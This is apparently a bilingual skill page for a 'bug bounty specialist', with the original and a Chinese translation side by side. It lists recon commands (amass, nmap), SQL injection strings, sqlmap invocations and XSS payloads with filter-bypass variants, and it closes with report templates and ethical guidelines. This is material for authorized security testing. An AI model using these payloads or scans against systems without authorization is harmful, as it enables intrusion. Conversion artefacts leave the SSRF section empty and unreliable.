bug-bounty-program
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseBug Bounty Program Specialist
Bug Bounty项目专家
Эксперт по исследованию уязвимостей и bug bounty hunting.
专注于漏洞研究和Bug Bounty狩猎的专家。
Методология тестирования
测试方法论
OWASP Top 10 Focus
聚焦OWASP Top 10
- Injection (SQL, NoSQL, LDAP, OS commands)
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
- 注入攻击(SQL、NoSQL、LDAP、操作系统命令)
- 身份认证漏洞
- 敏感数据泄露
- XML外部实体(XXE)
- 访问控制漏洞
- 安全配置错误
- 跨站脚本攻击(XSS)
- 不安全的反序列化
- 使用存在已知漏洞的组件
- 日志与监控不足
Распределение усилий
精力分配
- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%
- 侦察阶段:30%
- 手动测试:50%
- 自动化扫描:20%
Reconnaissance
侦察阶段
Subdomain Enumeration
子域名枚举
bash
undefinedbash
undefinedПассивное перечисление
被动枚举
amass enum -passive -d target.com -o subdomains.txt
amass enum -passive -d target.com -o subdomains.txt
Активное перечисление
主动枚举
subfinder -d target.com -all -o subfinder.txt
subfinder -d target.com -all -o subfinder.txt
DNS брутфорс
DNS暴力破解
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
Объединение результатов
合并结果
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
undefinedcat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
undefinedTechnology Stack Identification
技术栈识别
bash
undefinedbash
undefinedWappalyzer CLI
Wappalyzer CLI
wappalyzer https://target.com
wappalyzer https://target.com
WhatWeb
WhatWeb
whatweb -a 3 https://target.com
whatweb -a 3 https://target.com
Nuclei technology detection
Nuclei技术检测
nuclei -u https://target.com -t technologies/
undefinednuclei -u https://target.com -t technologies/
undefinedPort Scanning
端口扫描
bash
undefinedbash
undefinedБыстрое сканирование
快速扫描
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
Сканирование сервисов
服务扫描
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
undefinednmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
undefinedSQL Injection Testing
SQL注入测试
Manual Detection
手动检测
sql
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--
-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
-- Boolean-based blind
' AND 1=1--
' AND 1=2--sql
-- 基于错误的注入
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--
-- 基于时间的盲注
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
-- 基于布尔的盲注
' AND 1=1--
' AND 1=2--SQLMap
SQLMap工具使用
bash
undefinedbash
undefinedBasic injection test
基础注入测试
sqlmap -u "https://target.com/page?id=1" --batch
sqlmap -u "https://target.com/page?id=1" --batch
With authentication
带身份认证的测试
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
POST data
POST数据注入测试
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
Database enumeration
数据库枚举
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
undefinedsqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
undefinedXSS Testing
XSS测试
Payload Types
载荷类型
javascript
// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>javascript
// 反射型XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// DOM型XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
// 绕过过滤
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
// 存储型XSS(不同场景)
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>Context-Specific Payloads
特定场景载荷
javascript
// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='
// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"
// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>javascript
// HTML属性场景
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='
// JavaScript字符串场景
';alert('XSS');//
"-alert('XSS')-"
// URL参数场景
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>SSRF Testing
SSRF测试
Basic Payloads
基础载荷
undefinedundefinedLocalhost bypass
本地地址绕过
Cloud metadata
云元数据
Detection Methods
检测方法
python
undefinedpython
undefinedOut-of-band detection using Burp Collaborator
使用Burp Collaborator进行带外检测
Webhook.site for testing
使用Webhook.site进行测试
url = "https://webhook.site/unique-id"
undefinedurl = "https://webhook.site/unique-id"
undefinedReport Writing
报告撰写
Structure
报告结构
markdown
undefinedmarkdown
undefinedVulnerability Report
漏洞报告
Summary
摘要
[One-line description]
[一句话描述]
Severity
严重等级
[Critical/High/Medium/Low] - CVSS Score: X.X
[Critical/High/Medium/Low] - CVSS评分: X.X
Affected Component
受影响组件
[URL/Endpoint/Feature]
[URL/端点/功能]
Description
漏洞描述
[Detailed technical explanation]
[详细技术说明]
Steps to Reproduce
复现步骤
- [Step 1]
- [Step 2]
- [Step 3]
- [步骤1]
- [步骤2]
- [步骤3]
Proof of Concept
验证证明
[Screenshots, code, requests]
[截图、代码、请求包]
Impact
影响范围
[Business/technical impact]
[业务/技术影响]
Remediation
修复建议
[Specific recommendations]
[具体修复方案]
References
参考资料
[CVE, OWASP, etc.]
undefined[CVE、OWASP等链接]
undefinedCVSS Calculator Factors
CVSS评分计算器要素
- Attack Vector (AV): Network/Adjacent/Local/Physical
- Attack Complexity (AC): Low/High
- Privileges Required (PR): None/Low/High
- User Interaction (UI): None/Required
- Scope (S): Unchanged/Changed
- Confidentiality Impact (C): None/Low/High
- Integrity Impact (I): None/Low/High
- Availability Impact (A): None/Low/High
- 攻击向量(AV):网络/相邻/本地/物理
- 攻击复杂度(AC):低/高
- 所需权限(PR):无/低/高
- 用户交互(UI):无/需要
- 影响范围(S):未改变/已改变
- 保密性影响(C):无/低/高
- 完整性影响(I):无/低/高
- 可用性影响(A):无/低/高
Tools Checklist
工具清单
Reconnaissance
侦察工具
- Amass / Subfinder
- Nmap
- Shodan
- Google Dorks
- Amass / Subfinder
- Nmap
- Shodan
- Google Dorks
Web Testing
Web测试工具
- Burp Suite
- OWASP ZAP
- SQLMap
- Nuclei
- Burp Suite
- OWASP ZAP
- SQLMap
- Nuclei
Automation
自动化工具
- ffuf (fuzzing)
- httpx (probing)
- waybackurls
- gau (URLs gathering)
- ffuf(模糊测试)
- httpx(探测)
- waybackurls
- gau(URL收集)
Ethical Guidelines
道德准则
- Stay in scope — тестируйте только разрешенные цели
- Don't be destructive — избегайте DoS и потери данных
- Protect data — не распространяйте найденные данные
- Report responsibly — следуйте disclosure policy
- Document everything — ведите детальные записи
- Respect rate limits — не перегружайте системы
- 严格遵守测试范围 — 仅测试已获授权的目标
- 避免破坏性操作 — 拒绝DoS攻击和数据泄露行为
- 保护数据安全 — 不得传播获取到的数据
- 负责任地披露 — 遵循披露政策
- 完整记录过程 — 留存详细操作记录
- 遵守速率限制 — 不得过度负载目标系统
Program Selection Strategy
项目选择策略
Criteria
选择标准
- Response time history
- Bounty amounts
- Scope breadth
- Program maturity
- Community feedback
- 历史响应时间
- 赏金金额
- 测试范围广度
- 项目成熟度
- 社区反馈
Priority Matrix
优先级矩阵
| Program Type | Skill Level | Potential |
|---|---|---|
| New programs | Any | High |
| Broad scope | Intermediate | Medium |
| Narrow scope | Expert | Low-Medium |
| VDP only | Beginner | Low |
| 项目类型 | 技能水平 | 潜在收益 |
|---|---|---|
| 新项目 | 任意 | 高 |
| 广泛范围 | 中级 | 中 |
| 狭窄范围 | 专家 | 低-中 |
| 仅VDP项目 | 入门 | 低 |